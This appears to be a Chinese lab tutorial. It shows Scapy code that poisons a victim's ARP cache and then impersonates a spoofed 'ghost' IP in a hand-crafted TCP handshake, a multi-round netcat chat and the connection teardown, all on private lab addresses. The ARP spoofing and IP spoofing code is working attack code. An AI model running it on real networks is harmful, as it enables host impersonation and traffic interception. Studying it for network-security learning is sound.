nc多次聊天合体+ARP欺骗

#如果不需要伪装就去掉阶段二,并且将ghost_ip更改为正常kali A的IP
🟢 阶段一：启动受害者服务 (主机 B - 192.168.17.129)
nc -nvlp 20003
🔵 阶段二：实施 ARP 欺骗 (主机 A - 终端 1)
sudo scapy
在Scapy中：
victim_ip = "192.168.17.129"
ghost_ip = "192.168.17.17"
arp_pkt = ARP(op=2, pdst=victim_ip, psrc=ghost_ip)

print(f"开始 ARP 欺骗: {ghost_ip} is at My_MAC ...")
send(arp_pkt, loop=1, inter=1, verbose=0)
🔴 阶段三：冒充幽灵进行 TCP 握手 (主机 A - 终端 2)
sudo scapy
在Scapy中：
victim_ip = "192.168.17.129"
ghost_ip = "192.168.17.17"
target_port = 20003
my_port = 10003

# 发送 SYN
syn_pkt = IP(src=ghost_ip, dst=victim_ip)/TCP(sport=my_port, dport=target_port, flags="S", seq=1000)
send(syn_pkt)

# 接收 SYN+ACK 并回复 ACK
p_synack = sniff(filter=f"src host {victim_ip} and dst host {ghost_ip} and tcp port {my_port}", count=1)[0]

# 计算握手 ACK
my_ack = p_synack[TCP].seq + 1
my_seq = 1001

# 发送 ACK
ack_pkt = IP(src=ghost_ip, dst=victim_ip)/TCP(sport=my_port, dport=target_port, flags="A", seq=my_seq, ack=my_ack)
send(ack_pkt)
print("三次握手完成！")
🟣 阶段四：多轮双向对话
💬 第一轮：A 说话 -> B 回复
msg1 = "Hello B, I am 17!\n"
pkt1 = IP(src=ghost_ip, dst=victim_ip)/TCP(sport=my_port, dport=target_port, flags="PA", seq=my_seq, ack=my_ack)/Raw(load=msg1)
send(pkt1)

print("等待 B 的回复...")
# 捕获 B 的 PUSH 包
p_resp1 = sniff(filter=f"src host {victim_ip} and dst host {ghost_ip} and tcp port {my_port} and tcp[tcpflags] & tcp-push != 0", count=1)[0]
print(f"收到 B: {p_resp1[Raw].load.decode().strip()}")

# 更新 Seq 和 Ack
my_seq = p_resp1[TCP].ack
my_ack = p_resp1[TCP].seq + len(p_resp1[Raw])

# 发送纯 ACK 确认收到
send(IP(src=ghost_ip, dst=victim_ip)/TCP(sport=my_port, dport=target_port, flags="A", seq=my_seq, ack=my_ack))
💬 第二轮：A 继续说话 -> B 再次回复
msg2 = "How are you B?\n"
pkt2 = IP(src=ghost_ip, dst=victim_ip)/TCP(sport=my_port, dport=target_port, flags="PA", seq=my_seq, ack=my_ack)/Raw(load=msg2)
send(pkt2)

print("等待 B 的第二句回复...")
p_resp2 = sniff(filter=f"src host {victim_ip} and dst host {ghost_ip} and tcp port {my_port} and tcp[tcpflags] & tcp-push != 0", count=1)[0]
print(f"收到 B: {p_resp2[Raw].load.decode().strip()}")

# 更新 Seq 和 Ack
my_seq = p_resp2[TCP].ack
my_ack = p_resp2[TCP].seq + len(p_resp2[Raw])

# 发送 ACK
send(IP(src=ghost_ip, dst=victim_ip)/TCP(sport=my_port, dport=target_port, flags="A", seq=my_seq, ack=my_ack))
💬 第三轮：A 结束对话 (FIN)
# 发送 FIN+ACK
fin_pkt = IP(src=ghost_ip, dst=victim_ip)/TCP(sport=my_port, dport=target_port, flags="FA", seq=my_seq, ack=my_ack)
send(fin_pkt)
print("已发送 FIN 断开连接")

# 接收B对FIN的ACK确认
print("等待B对FIN的ACK确认...")
ack_fin = sniff(filter=f"src host {victim_ip} and dst host {ghost_ip} and tcp port {my_port} and tcp[tcpflags] & tcp-ack != 0", count=1, timeout=3)[0]
print("收到B的ACK确认")

# 接收B的FIN（B也关闭连接）
print("等待B的FIN...")
fin_b = sniff(filter=f"src host {victim_ip} and dst host {ghost_ip} and tcp port {my_port} and tcp[tcpflags] & tcp-fin != 0", count=1, timeout=3)[0]
print("收到B的FIN")

# 更新序列号和确认号
my_seq = fin_b[TCP].ack  # B期望的序列号
my_ack = fin_b[TCP].seq + 1  # B的序列号+1

# 发送对B的FIN的ACK确认
fin_ack = IP(src=ghost_ip, dst=victim_ip)/TCP(sport=my_port, dport=target_port, flags="A", seq=my_seq, ack=my_ack)
send(fin_ack)